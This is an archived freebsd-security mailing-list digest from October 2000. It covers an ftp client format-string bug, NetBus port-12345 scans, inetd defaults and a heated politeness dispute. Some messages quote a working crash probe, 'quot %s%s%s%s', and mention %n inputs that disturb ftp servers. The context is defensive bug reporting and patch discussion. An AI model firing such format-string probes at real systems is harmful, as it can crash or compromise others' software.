To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 1:51:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 2BD4037B502 for ; Tue, 3 Oct 2000 01:51:10 -0700 (PDT) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id KAA92537; Tue, 3 Oct 2000 10:51:05 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Michael Bryan Cc: security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf References: <200010030008.RAA18074@freefall.freebsd.org> <20001002172133.B27736@fw.wintelcom.net> <39D93044.8B0C4E69@ursine.com> From: Dag-Erling Smorgrav Date: 03 Oct 2000 10:51:05 +0200 In-Reply-To: Michael Bryan's message of "Mon, 02 Oct 2000 18:03:00 -0700" Message-ID: Lines: 11 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Michael Bryan writes: > A command that I -always- execute on any freshly installed system, and from > time to time when checking up on things: > > netstat -an Funny way to spell "sockstat except with less information" :) DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 1:57:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 8D84837B502 for ; Tue, 3 Oct 2000 01:57:44 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) 
by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13gNzY-000PRH-00; Tue, 03 Oct 2000 03:04:04 -0600 Message-ID: <39D9A104.ECAEEDCC@softweyr.com> Date: Tue, 03 Oct 2000 03:04:04 -0600 From: Wes Peters Reply-To: John Howie Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Poul-Henning Kamp Cc: John Howie , James Wyatt , Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 References: <23683.970516562@critter> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <036301c02caa$ebc17300$fd01a8c0@pacbell.net>, "John Howie" writes: >> >Are you saying that if we found a terrible bug (not this easy one) >> >somewhere critical in 3.5.%d, we'd all have to immediatly upgrade? - Jy@ >> >> Yes, I am saying that. > ^^^^^^^^^^^^^^^^^^^^^ > >And this is why Linux, FreeBSD, OpenBSD, et al will NEVER beat a supported >pay-for-use Operating System like Windows in the eyes of real-world >business-critical system administrators and CIOs. Of course, all the egos, >moaning, and bitching don't help either. Oh, yeah, Mickeysoft is going to go back and fix that nasty little bug in Win95 for you, because you were a good boy and paid up your MSDN Enterprise subscription. Since this has nothing to do with security, I wisely disincluded them. -- "Where am I, and what am I doing in this handbasket?" 
Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/

From owner-freebsd-security Tue Oct 3 2: 1: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id B292837B502 for ; Tue, 3 Oct 2000 02:00:57 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13gNqB-0005y2-00; Tue, 03 Oct 2000 10:54:23 +0200 Date: Tue, 3 Oct 2000 10:54:22 +0200 (IST) From: Roman Shterenzon To: Dave McKay Cc: security@FreeBSD.org Subject: Re: politeness [was: ftpd bug in FreeBSD through at least 3.4] In-Reply-To: <20001003033815.A27544@elvis.mu.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Tue, 3 Oct 2000, Dave McKay wrote:
> Brett,
..snip..
> My second rant is, have you ever noticed WHENEVER you write into the list it's ALWAYS
> the longest current thread running within a VERY short time? Do you think this is
> because of your genius in the BSD OS field? Or perhaps it's due to your keen wits
> being always about you when you write in. Please, and I mean this, DIE.

Everyone has a right to write to the list and share his thoughts. The list is not moderated, you know. Perhaps some of us, sometimes, need to dedicate some more time to thinking before posting. And it includes you as well, Mr. Dave McKay.

--Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel.
Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 2:10:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id F204337B66D; Tue, 3 Oct 2000 02:10:08 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13gOEt-000PRb-00; Tue, 03 Oct 2000 03:19:56 -0600 Message-ID: <39D9A4BB.1DB621CD@softweyr.com> Date: Tue, 03 Oct 2000 03:19:55 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: Kris Kennaway , Alex Charalabidis , "Chris D . Faulhaber" , security@FreeBSD.org Subject: Re: ftpd bug in FreeBSD through at least 3.4 References: <4.3.2.7.2.20001002125825.00de8f00@localhost> <4.3.2.7.2.20001002123113.049344d0@localhost> <4.3.2.7.2.20001002125825.00de8f00@localhost> <4.3.2.7.2.20001002173916.046c16f0@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > > At 03:39 PM 10/2/2000, Kris Kennaway wrote: > > >No, I think your client is expanding the %s locally and sending the > >junk to the server. > > Kris: > > I think you may be right here! The client may also be expanding the > %s on the way BACK from the server. If this is the case, it is > more serious because it means that a malicious server might be > able to take over the client. A packet trace would be helpful here. I find ethereal to be quite an agreeable tool. -- "Where am I, and what am I doing in this handbasket?" 
Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/

From owner-freebsd-security Tue Oct 3 2:40:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from pericles.IPAustralia.gov.au (pericles.IPAustralia.gov.au [202.14.186.30]) by hub.freebsd.org (Postfix) with ESMTP id 52EC237B66C for ; Tue, 3 Oct 2000 02:40:33 -0700 (PDT) Received: (from smap@localhost) by pericles.IPAustralia.gov.au (8.9.3/8.9.3) id UAA73576 for ; Tue, 3 Oct 2000 20:40:30 +1100 (EST) (envelope-from anwsmh@IPAustralia.Gov.AU) Received: from wf-144.aipo.gov.au(192.168.1.144) by pericles.IPAustralia.gov.au via smap (V2.0) id xma073568; Tue, 3 Oct 00 20:40:01 +1100 Received: from localhost (anwsmh@localhost) by stan (8.9.3/8.9.3) with ESMTP id UAA00375 for ; Tue, 3 Oct 2000 20:40:14 +1100 (EST) (envelope-from anwsmh@IPAustralia.Gov.AU) X-Authentication-Warning: stan: anwsmh owned process doing -bs Date: Tue, 3 Oct 2000 20:40:13 +1100 (EST) From: Stanley Hopcroft X-Sender: anwsmh@stan To: security@FreeBSD.ORG Subject: Re: politeness [was: ftpd bug in FreeBSD through at least 3.4] In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Dear Ladies and Gentlemen,

I am writing to wholeheartedly endorse Mr Shterenzon's request.

On Tue, 3 Oct 2000, Roman Shterenzon wrote about a letter from someone else
> > Brett,
> ..snip..
> > My second rant is, have you ever noticed WHENEVER you write into the list it's ALWAYS
> > the longest current thread running within a VERY short time? Do you think this is
> > because of your genius in the BSD OS field? Or perhaps it's due to your keen wits
> > ..snip2..
>
> Everyone has a right to write to the list and share his thoughts.
> The list is not moderated, you know.
> Perhaps some of us, sometimes, need to dedicate some more time to thinking
> before posting.
> And it includes you as well ..snipped..

Hear, hear.

Please, those who write wishing bad things to happen to others: if you have any respect for *yourself*, abstain from personal attacks, no matter how justified you are, or how stupid and provocative the other (me for example) is. Unfortunately, it's not so simple to undo the immense damage that this does to one's mind, body and reputation.

Maybe as one famous person once said in this context, there is a case for procmail filtering of the opinions of those you can't abide. Or, simply knowing in yourself that the person or persons advocating the wrong opinion is wrong, and that most other readers or contributors will realise this themselves.

Lastly, those such as Mr Kennaway, Losh, Watson, etc. who have a lot at stake haven't seen fit to respond like this, so why should others?

> > --Roman Shterenzon, UNIX System Administrator and Consultant
> [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]
>

Thank you,

Yours sincerely.

S Hopcroft IP Australia +61 2 6283 3189 +61 2 6281 1353 FAX

From owner-freebsd-security Tue Oct 3 2:45:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 5DF5437B503 for ; Tue, 3 Oct 2000 02:45:09 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!)
by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13gOlG-000PUQ-00; Tue, 03 Oct 2000 03:53:22 -0600 Message-ID: <39D9AC91.8CA24148@softweyr.com> Date: Tue, 03 Oct 2000 03:53:21 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Roman Shterenzon Cc: Dave McKay , security@FreeBSD.org Subject: Re: politeness [was: ftpd bug in FreeBSD through at least 3.4] References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Roman Shterenzon wrote:
>
> On Tue, 3 Oct 2000, Dave McKay wrote:
>
> > Brett,
> ..snip..
> > My second rant is, have you ever noticed WHENEVER you write into the list it's ALWAYS
> > the longest current thread running within a VERY short time? Do you think this is
> > because of your genius in the BSD OS field? Or perhaps it's due to your keen wits
> > being always about you when you write in. Please, and I mean this, DIE.
>
> Everyone has a right to write to the list and share his thoughts.

No, the list has a charter. This is a republic, not a democracy.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 3:55:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from sun262.hai.iec.co.il (sun262.hai.iec.co.il [138.134.2.62]) by hub.freebsd.org (Postfix) with ESMTP id 2E49137B503 for ; Tue, 3 Oct 2000 03:55:56 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by sun262.hai.iec.co.il (Postfix) with ESMTP id 5FEA27070 for ; Tue, 3 Oct 2000 13:55:34 +0300 (IDT) Date: Tue, 3 Oct 2000 13:55:34 +0300 (IDT) From: Roman Shterenzon X-Sender: roman@sun262.hai.iec.co.il To: freebsd-security@freebsd.org Subject: OpenSSH Message-ID: Organization: Xpert UNIX Systems Ltd. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello all, I'm going through weekly BSD security digest: http://securityportal.com/topnews/weekly/bsd20001002.html What is that OpenSSH bug they're talking about? Does anyone know of a workaround? --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. 
Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 7: 2:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.houston.rr.com (sm1.texas.rr.com [24.93.35.54]) by hub.freebsd.org (Postfix) with ESMTP id 22ED937B502 for ; Tue, 3 Oct 2000 07:02:29 -0700 (PDT) Received: from bloop.craftncomp.com ([24.27.77.164]) by mail.houston.rr.com with Microsoft SMTPSVC(5.5.1877.537.53); Tue, 3 Oct 2000 09:04:22 -0500 Received: from bloop.craftncomp.com (localhost.craftncomp.com [127.0.0.1]) by bloop.craftncomp.com (8.11.0/8.9.3) with ESMTP id e93E29p53594 for ; Tue, 3 Oct 2000 09:02:10 -0500 (CDT) (envelope-from shocking@bloop.craftncomp.com) Message-Id: <200010031402.e93E29p53594@bloop.craftncomp.com> X-Mailer: exmh version 2.1.1 10/15/1999 To: security@freebsd.org Subject: Script kiddies and port 12345 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 03 Oct 2000 09:02:09 -0500 From: Stephen Hocking Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org After a couple of weeks of probing 139, the little darlings are now hammering on 12345 - anybody have an idea of what hole this is? Another backdoor? Stephen -- The views expressed above are not those of PGS Tensor. "We've heard that a million monkeys at a million keyboards could produce the Complete Works of Shakespeare; now, thanks to the Internet, we know this is not true." 
Robert Wilensky, University of California

From owner-freebsd-security Tue Oct 3 7: 2:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 2F48D37B66C for ; Tue, 3 Oct 2000 07:02:31 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA06538; Tue, 3 Oct 2000 07:01:16 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda06536; Tue Oct 3 07:01:14 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.0/8.9.1) id e93E1Ex00927; Tue, 3 Oct 2000 07:01:14 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdFHn919; Tue Oct 3 07:00:42 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e93E0fZ11189; Tue, 3 Oct 2000 07:00:41 -0700 (PDT) Message-Id: <200010031400.e93E0fZ11189@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdq11185; Tue Oct 3 07:00:10 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1-RELEASE X-Sender: cy To: Brett Glass Cc: Fernando Schapachnik , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-reply-to: Your message of "Mon, 02 Oct 2000 12:30:08 MDT." <4.3.2.7.2.20001002122853.04b25e00@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Mime-Version: 1.0 Content-Transfer-Encoding: quoted-printable Date: Tue, 03 Oct 2000 07:00:10 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Brett, send me the exploit and I will confirm it on some 4.x boxen for you.
Regards,

Phone: (250)387-8437 Cy Schubert
Fax: (250)387-5766 Team Leader, Sun/DEC Team
Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC

In message <4.3.2.7.2.20001002122853.04b25e00@localhost>, Brett Glass writes:
> Fernando:
>
> I did NOT make a mistake. It works in FreeBSD's own ftpd in
> FreeBSD 3.4 and earlier; maybe some later versions as well.
>
> --Brett
>
> At 12:24 PM 10/2/2000, Fernando Schapachnik wrote:
>
> >This describes a bug in wu-ftp, not in BSD-ftpd.
> >
> >Please double check before scaring us all.
> >
> >Regards!
> >
> >In an earlier message, Brett Glass wrote:
> >> I've received LOTS of anonymous FTP login attempts on the FreeBSD boxen
> >> I administer, and have been wondering why. Perhaps this message explains
> >> it! The below works on all 2.x versions of FreeBSD, and in the 3.x branch
> >> up until at least 3.4-RELEASE (maybe later).
> >[...]
> >> >Connected to 1127.0.0.1.
> >> >220 somewhere.in.internet FTP server (Version wu-2.6.1(1) Mon Jul 3 10:49:59 EEST 2000) ready.
> >
> >
> >Fernando P. Schapachnik
> >Network Administration
> >VIA NET.WORKS ARGENTINA S.A.
> >fernando@via-net-works.net.ar
> >(54-11) 4323-3333

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Oct 3 7: 5:44 2000
From: Justin Stanford
Date: Tue, 3 Oct 2000 16:05:22 +0200 (SAST)
To: Stephen Hocking
Cc: security@freebsd.org
Subject: Re: Script kiddies and port 12345

Heh.. that's netbus.. a Windows Trojan - they are probably scanning for
open netbus servers. 12346 is also common.

On Tue, 3 Oct 2000, Stephen Hocking wrote:

> After a couple of weeks of probing 139, the little darlings are now hammering
> on 12345 - anybody have an idea of what hole this is? Another backdoor?
>
>
>         Stephen
> --
> The views expressed above are not those of PGS Tensor.
>
> "We've heard that a million monkeys at a million keyboards could produce
> the Complete Works of Shakespeare; now, thanks to the Internet, we know
> this is not true."
>                         Robert Wilensky, University of California

From owner-freebsd-security Tue Oct 3 7:12:35 2000
From: Michael Williams
Date: Tue, 3 Oct 2000 10:12:13 -0400 (EDT)
To: Stephen Hocking
Cc: security@freebsd.org
Subject: Re: Script kiddies and port 12345

On Tue, 3 Oct 2000, Stephen Hocking wrote:

> After a couple of weeks of probing 139, the little darlings are now hammering
> on 12345 - anybody have an idea of what hole this is? Another backdoor?

Well, if they're probing 139 and 12345, I would assume they're looking for
NT machines that have Server Management System installed on 'em (or an old
version of NetBus, since that's what a couple of scanners I've used have
defaulted to for a description of port 12345). SMS is a remote
administration tool for NT machines; I don't know of any specific
vulnerabilities in the current version, but I would love to be corrected
if I'm wrong.
Regards,
Michael Williams
NewSouth Communications -- IP Security Team

From owner-freebsd-security Tue Oct 3 7:17:30 2000
From: Justin Stanford
Date: Tue, 3 Oct 2000 16:17:04 +0200 (SAST)
To: Michael Williams
Cc: Stephen Hocking, security@freebsd.org
Subject: Re: Script kiddies and port 12345

More than likely they are just looking for open shares on the SMB port
(139) and netbus servers on port 12345 - this is more within the reach and
ability of the average kiddie and is as common an occurrence as dried
fruit :-)

Regards,
jus

On Tue, 3 Oct 2000, Michael Williams wrote:

>
> On Tue, 3 Oct 2000, Stephen Hocking wrote:
>
> > After a couple of weeks of probing 139, the little darlings are now hammering
> > on 12345 - anybody have an idea of what hole this is? Another backdoor?
>
> Well, if they're probing 139 and 12345, I would assume they're looking for
> NT machines that have Server Management System installed on 'em (or an old
> version of NetBus, since that's what a couple of scanners I've used have
> defaulted to for a description of port 12345). SMS is a remote
> administration tool for NT machines; I don't know of any specific
> vulnerabilities in the current version, but I would love to be corrected
> if I'm wrong.
>
> Regards,
> Michael Williams
> NewSouth Communications -- IP Security Team

From owner-freebsd-security Tue Oct 3 7:35:55 2000
From: Alex Prohorenko
Organization: Alkar-Teleport News server
Date: 3 Oct 2000 14:08:42 GMT
To: freebsd-security@freebsd.org
Subject: Re: Script kiddies and port 12345

Stephen Hocking wrote:

> After a couple of weeks of probing 139, the little darlings are now hammering
> on 12345 - anybody have an idea of what hole this is? Another backdoor?

That's a default NetBus port. Also 12346 is used.
NetBus is a Windows Remote Administration Tool (as the author calls it),
or, in simple words - a Windows Trojan :>

--
Alexander Prohorenko, Alkar Teleport

From owner-freebsd-security Tue Oct 3 8:12:48 2000
From: Michael Williams
Date: Tue, 3 Oct 2000 11:12:43 -0400 (EDT)
To: security@freebsd.org
Subject: Re: Script kiddies and port 12345

On Tue, 3 Oct 2000, Justin Stanford wrote:

> More than likely they are just looking for open shares on the SMB port
> (139) and netbus servers on port 12345 - this is more within the reach and
> ability of the average kiddie and is as common an occurrence as dried
> fruit :-)

Yes, true. But if someone popped up with a new vulnerability for SMS
(which runs on port 12345 on -our- network's NT machines, but I'm not an
NT admin, so I don't know whether that's default), it would be neat. I
like anything that supports the cause of BSD over Windows. :)

Regards,
Michael Williams

From owner-freebsd-security Tue Oct 3 8:30:29 2000
From: Warner Losh
Date: Tue, 03 Oct 2000 09:30:13 -0600
To: Paul Richards
Cc: Kris Kennaway, Joseph Scott, Brian Somers, cvs-committers@FreeBSD.org,
    cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org
Subject: Re: cvs commit: src/usr.bin/finger finger.c

In message <39D98B55.126DAFC4@originative.co.uk> Paul Richards writes:
: Code may look like it's working after a few days or a few weeks but it
: really needs to *mature* before it can be claimed to be stable.

Yes. In this case the code was pushed in after only two weeks in current.

: I think we push too many enhancements from current to stable, when we
: should really only push bug fixes onto the stable branch. The tendency
: to add enhancements carries the risk of actually creating new bugs in
: stable which is obviously not what we want to have happen.

Exactly. We shouldn't be merging features at all, unless there's a
compelling reason, the code has been reviewed by at least two people
and it has had at least a month or two in current. If you can't find
two people to review the code, then you can't merge it to stable due
to lack of interest.

Warner

From owner-freebsd-security Tue Oct 3 8:46: 7 2000
From: Bart_van_Leeuwen@doosys.com
Date: Tue, 3 Oct 2000 17:45:52 +0200
To: Michael Williams
Cc: owner-freebsd-security@FreeBSD.ORG, security@FreeBSD.ORG
Subject: Re: Script kiddies and port 12345

Of course it would be interesting to hear about any new vulnerabilities in
NT and products running on it...

Using the existence of specific vulnerabilities however is often a very bad
argument pro or against any platform. Known vulnerabilities that are left
exploitable by a vendor, bad information about the existence of such
vulnerabilities, and the actual effort of a vendor to prevent such
vulnerabilities might be much better arguments.
After all, no piece of software is 100% free from such things, and pointing
blindly to vulnerabilities in other products is something that is quite
likely to work against you.

Just my opinion of course.. ;-)

Bart van Leeuwen.
mailto:Bart_van_Leeuwen@doosys.com   http://www.doosys.com/
mailto:bart@ixori.demon.nl           http://www.ixori.demon.nl/

Michael Williams
Sent by: owner-freebsd-security@FreeBSD.ORG
03-10-2000 17:12
cc:
Subject: Re: Script kiddies and port 12345

On Tue, 3 Oct 2000, Justin Stanford wrote:

> More than likely they are just looking for open shares on the SMB port
> (139) and netbus servers on port 12345 - this is more within the reach and
> ability of the average kiddie and is as common an occurrence as dried
> fruit :-)

Yes, true. But if someone popped up with a new vulnerability for SMS
(which runs on port 12345 on -our- network's NT machines, but I'm not an
NT admin, so I don't know whether that's default), it would be neat. I
like anything that supports the cause of BSD over Windows. :)

Regards,
Michael Williams

From owner-freebsd-security Tue Oct 3 9:11:39 2000
From: Nate Williams
Reply-To: nate@yogotech.com (Nate Williams)
Date: Tue, 3 Oct 2000 10:11:18 -0600 (MDT)
To: Mike Silbersack
Cc: Nate Williams, Jordan Hubbard, Alfred Perlstein, "Jordan K. Hubbard",
    security@FreeBSD.ORG
Subject: Re: cvs commit: src/etc inetd.conf

> > > > Can we please lose everything but telnet and ftp? This getting
> > >
> > > That wouldn't bother me at all.
> >
> > I think the 'internal' auth should be on as well, since sendmail (for
> > silly reasons) likes it on, and the internal version is silly enough to
> > keep sendmail happy.
> >
> >
> > Nate
>
> Isn't sendmail just as happy getting a RST back when it tries to
> connect?

Yep, but it slows mail transfers down quite a bit.
Nate

From owner-freebsd-security Tue Oct 3 9:22:14 2000
From: Brett Glass
Date: Tue, 03 Oct 2000 10:18:47 -0600
To: Max Khon, Neil Blakey-Milner
Cc: "Chris D . Faulhaber", security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4

At 11:20 PM 10/2/2000, Max Khon wrote:

>> Using binary mode to transfer files.
>> ftp> quot %s%s%s%s
>> 500 '%S%S%S%S': command not understood.
>>
>> A 3.4 ftp client to 'futon' also segfaults. The ftp server doesn't
>> segfault in the cases I've tried.
>
>this was fixed in HEAD, RELENG_4 and RELENG_3 on Jun 23 2000
>(cmds.c 1.17, 1.16.2.1 and 1.14.2.3)
>
>/fjoe

This fixes the bug in the client, which goes ALL THE WAY BACK to
Berkeley ftp of ages past. I believe that this is the source of the
problem in the Microsoft client, too, as it is BSD-derived. Don't know
about the Linux code, but I would not be surprised if it were cribbed
from BSD (possibly without attribution -- and, if so, in violation of
the BSD license). I am beginning to think that this bug exists in a very
large percentage of the command line ftp clients in the world. Am still
checking out various servers. Some do behave strangely when fed strings
with %s and (especially) %n.

--Brett

From owner-freebsd-security Tue Oct 3 9:22:49 2000
From: Brett Glass
Date: Tue, 03 Oct 2000 10:22:25 -0600
To: Wes Peters
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: sysinstall DOESN'T ASK, dangerous defaults!

At 01:12 AM 10/3/2000, Wes Peters wrote:

>Have you not been asking for a standard FreeBSD installation in which FTP
>and Telnet will not work? Yes or no will suffice.

Have you stopped beating your wife? Yes or no will suffice.
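The client-side format-string bug from the "ftpd bug in FreeBSD through at least 3.4" thread above (the ftp client, not the server, segfaults on `quot %s%s%s%s`), as an added C illustration that is not the page's or FreeBSD's code: the vulnerable idiom beside its fixed form, plus a review-time check. It assumes the usual cause of this bug class, a printf-style command helper receiving the user's text as its format argument; `send_command`, `quote_vulnerable`, `quote_fixed` and `has_format_directives` are made-up names, and the exact cmds.c code path is not shown on the page.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Constructed illustration (not FreeBSD's ftp client) of CWE-134, the
 * format-string bug class behind the "quot %s%s%s%s" client crash.
 * Function names are assumptions; the real cmds.c path is not shown. */

#define CMD_MAX 512

/* printf-style command builder, modelled on the BSD idiom of a varargs
 * command(fmt, ...) helper that formats what goes on the control channel.
 * Here it writes into a caller buffer instead of a socket. */
static int send_command(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    int n;

    va_start(ap, fmt);
    n = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    return n;
}

/* VULNERABLE: the user's "quote" text is passed as the format itself.
 * "%s%s%s%s" makes vsnprintf pull pointers from nonexistent variadic
 * slots and dereference them (the segfault seen in the thread); "%n"
 * turns the same mistake into a memory write. Kept only to contrast
 * with the fixed form; nothing below calls it. */
static int quote_vulnerable(char *out, size_t outsz, const char *user_text)
{
    return send_command(out, outsz, user_text);
}

/* FIXED (the shape of the standard repair): the format is a constant and
 * the user's text is an argument, so its '%' characters are copied verbatim. */
static int quote_fixed(char *out, size_t outsz, const char *user_text)
{
    return send_command(out, outsz, "%s\r\n", user_text);
}

/* Review/defence helper: true if a string carries printf conversions.
 * "%%" is a literal percent and is skipped; a lone trailing '%' counts
 * as a directive because printf's behaviour on it is undefined. */
static int has_format_directives(const char *s)
{
    for (; *s != '\0'; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* escaped percent, not a conversion */
            s++;
            continue;
        }
        return 1;
    }
    return 0;
}

/* Round trip: does the fixed path carry the user's text through unchanged,
 * followed only by the CRLF terminator? */
static int fixed_preserves_text(const char *user_text)
{
    char buf[CMD_MAX];
    size_t len;

    if (quote_fixed(buf, sizeof buf, user_text) < 0)
        return 0;
    len = strlen(user_text);
    return strncmp(buf, user_text, len) == 0 && strcmp(buf + len, "\r\n") == 0;
}

int main(void)
{
    /* Constructed inputs: the probe from the thread, a %n variant, a benign
     * command and an escaped percent. */
    const char *probes[] = { "%s%s%s%s", "%n%n%n%n", "SITE HELP", "100%% done" };
    char buf[CMD_MAX];
    size_t i;

    for (i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        quote_fixed(buf, sizeof buf, probes[i]);
        printf("%-12s directives=%d sent=%s", probes[i],
               has_format_directives(probes[i]), buf);
    }
    (void)quote_vulnerable;   /* referenced so the contrast compiles cleanly */
    return 0;
}
```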
--Brett Glass

From owner-freebsd-security Tue Oct 3 9:32:17 2000
From: Brett Glass
Date: Tue, 03 Oct 2000 10:31:14 -0600
To: Dave McKay
Cc: security@FreeBSD.org
Subject: Re: ftpd bug in FreeBSD through at least 3.4

At 02:38 AM 10/3/2000, Dave McKay wrote:

>Brett,
>
>This bug was a non-issue from the start, why did you have to drag your results on
>to the list? Wasn't it apparent after Warner said that they no longer support
>older releases of FreeBSD due to resource shortness that the thread was pointless?

It is important to warn people who are still using older releases of
FreeBSD of security problems in them, even if they are not officially
"supported." There are many people out there who use and depend on them.
It is mean-spirited of you, IMHO, to lobby to cut those people off.
>My second rant is, have you ever noticed WHENEVER you write into the list it's ALWAYS
>the longest current thread running within a VERY short time?

Not always. However, I like to think that when it does happen it is
usually because the issues I mention are important. Of course, some
people also seem to enjoy flaming me, as you are doing here.

>Do you think this is
>because of your genius in the BSD OS field? Or perhaps it's due to your keen wits
>being always about you when you write in.

See above.

> Please, and I mean this, DIE.

What a friendly, constructive, and helpful sentiment. Not.

--Brett

From owner-freebsd-security Tue Oct 3 9:33:59 2000
From: Brett Glass
Date: Tue, 03 Oct 2000 10:33:45 -0600
To: Wes Peters
Cc: Kris Kennaway, Alex Charalabidis, "Chris D . Faulhaber", security@FreeBSD.org
Subject: Re: ftpd bug in FreeBSD through at least 3.4

At 03:19 AM 10/3/2000, Wes Peters wrote:

